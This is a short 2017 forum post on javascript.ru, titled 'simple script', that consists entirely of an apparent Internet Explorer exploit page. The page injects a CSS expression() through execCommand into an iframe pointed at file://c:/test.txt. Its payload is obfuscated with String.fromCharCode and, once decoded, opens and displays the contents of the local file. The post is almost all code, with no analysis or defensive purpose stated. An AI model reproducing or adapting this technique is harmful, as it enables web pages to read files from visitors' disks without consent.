Javascript-форум (https://javascript.ru/forum/)
-   Ваши сайты и скрипты (https://javascript.ru/forum/project/)
-   -   Простенький скрипт (https://javascript.ru/forum/project/71254-prostenkijj-skript.html)

Еремей 04.11.2017 20:29

Простенький скрипт
 
</head>
<body>
<script>
alert("Create text file c:\\test.txt and it will be read");
function f()
{
I1.focus();
document.execCommand("selectAll");
document.execCommand("InsertParagraph",false,">\"S TYLE='left:expressio
n(eval(String.fromCharCode(97,61,119,105,110,100,1 11,119,46,111,112,10
1,110,40,39,102,105,108,101,58,47,47,99,58,47,116, 101,115,116,46,116,1
20,116,39,41,59,97,108,101,114,116,40,97,46,100,11 1,99,117,109,101,110
,116,46,98,111,100,121,46,105,110,110,101,114,84,1 01,120,116,41)));'")
;
}
setTimeout('f()',2000);
</script>
<iframe id="I1" src="file://c:/test.txt"></iframe>
</body>
</html>


Часовой пояс GMT +3, время: 07:16.